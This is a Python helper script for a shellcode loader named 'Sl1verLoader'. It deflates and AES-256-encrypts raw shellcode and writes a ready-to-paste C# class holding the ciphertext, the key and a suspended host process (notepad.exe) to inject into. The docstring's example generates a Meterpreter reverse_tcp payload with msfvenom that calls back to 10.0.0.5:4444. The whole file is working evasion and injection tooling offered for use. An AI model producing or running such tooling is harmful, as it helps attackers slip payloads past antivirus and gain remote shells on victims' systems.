#!/usr/bin/env python3
"""
Sl1verLoader encryptor helper
=============================
Pipeline:  raw shellcode  ->  deflate/gzip  ->  AES-256-CBC (PKCS7)  ->  blob

Blob format (payload.bin and EncryptedShellcode are identical):
    [16-byte AES IV][AES-256-CBC ciphertext]

Outputs:
    payload.bin  - binary blob (IV + ciphertext)
    payload.cs   - C# Payload class, paste-ready for Sl1verLoader.cs

Usage:
    python3 encryptor.py shellcode.bin [-c deflate9|gzip|none] [-t notepad.exe] [-o outdir]

Example:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f raw -o sc.bin
    python3 encryptor.py sc.bin -c deflate9 -t notepad.exe
"""
import argparse
import gzip
import os
import sys
import zlib

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Random import get_random_bytes


def raw_deflate(data, level=9):
    """Raw DEFLATE stream (zlib header stripped) -- matches .NET DeflateStream."""
    co = zlib.compressobj(level, zlib.DEFLATED, -15)
    return co.compress(data) + co.flush()


def csharp_bytes(data, indent="        ", per_line=16):
    lines = []
    for i in range(0, len(data), per_line):
        chunk = ", ".join("0x%02x" % b for b in data[i:i + per_line])
        lines.append(indent + chunk + ",")
    return "\n".join(lines)


def main():
    ap = argparse.ArgumentParser(description="Encrypt shellcode for the hardcoded-payload Sl1verLoader.")
    ap.add_argument("shellcode", help="raw shellcode binary (e.g. msfvenom -f raw output)")
    ap.add_argument("-c", "--compression", choices=["deflate9", "gzip", "none"],
                    default="deflate9", help="compression used before encryption (default: deflate9)")
    ap.add_argument("-t", "--target", default="notepad.exe",
                    help="suspended host binary spawned in System32 (default: notepad.exe)")
    ap.add_argument("-o", "--outdir", default=".", help="output directory (default: current dir)")
    args = ap.parse_args()

    with open(args.shellcode, "rb") as f:
        raw = f.read()
    if not raw:
        sys.exit("[!] shellcode file is empty")

    # compress
    if args.compression == "deflate9":
        stage = raw_deflate(raw, 9)
    elif args.compression == "gzip":
        stage = gzip.compress(raw, compresslevel=9)
    else:
        stage = raw

    # encrypt: random 32-byte key, random 16-byte IV, blob = IV + ciphertext
    key = get_random_bytes(32)
    iv = get_random_bytes(16)
    ciphertext = AES.new(key, AES.MODE_CBC, iv).encrypt(pad(stage, AES.block_size))
    blob = iv + ciphertext

    os.makedirs(args.outdir, exist_ok=True)
    bin_path = os.path.join(args.outdir, "payload.bin")
    cs_path = os.path.join(args.outdir, "payload.cs")

    with open(bin_path, "wb") as f:
        f.write(blob)

    cs = (
        "// payload.cs - generated by encryptor.py\n"
        "// Replace the Payload class in Sl1verLoader.cs with this file's contents,\n"
        "// or save it as payload.cs and delete the stub Payload class from the loader.\n"
        "// shellcode: %s (%d bytes) | compression: %s | target: %s\n"
        "// AES key (hex): %s\n"
        "// AES IV  (hex): %s\n"
        "public static class Payload\n"
        "{\n"
        "    // First 16 bytes of EncryptedShellcode are the AES IV (matches payload.bin exactly).\n"
        "    public static byte[] EncryptedShellcode = new byte[]\n"
        "    {\n%s\n"
        "    };\n"
        "    public static byte[] AESKey = new byte[]\n"
        "    {\n%s\n"
        "    };\n"
        "    public static string CompressionAlgorithm = \"%s\";\n"
        "    public static string TargetBinary = \"%s\";\n"
        "}\n"
    ) % (
        os.path.basename(args.shellcode), len(raw), args.compression, args.target,
        key.hex(), iv.hex(),
        csharp_bytes(blob),
        csharp_bytes(key),
        args.compression,
        args.target,
    )

    with open(cs_path, "w") as f:
        f.write(cs)

    print("[+] raw shellcode     : %d bytes (%s)" % (len(raw), args.shellcode))
    print("[+] compressed (%s)   : %d bytes" % (args.compression, len(stage)))
    print("[+] encrypted blob    : %d bytes (IV 16 + ciphertext %d)" % (len(blob), len(ciphertext)))
    print("[+] AES key (hex)     : %s" % key.hex())
    print("[+] AES IV  (hex)     : %s" % iv.hex())
    print("[+] C# payload class  : %s" % cs_path)
    print("[+] encrypted BIN     : %s" % bin_path)


if __name__ == "__main__":
    main()
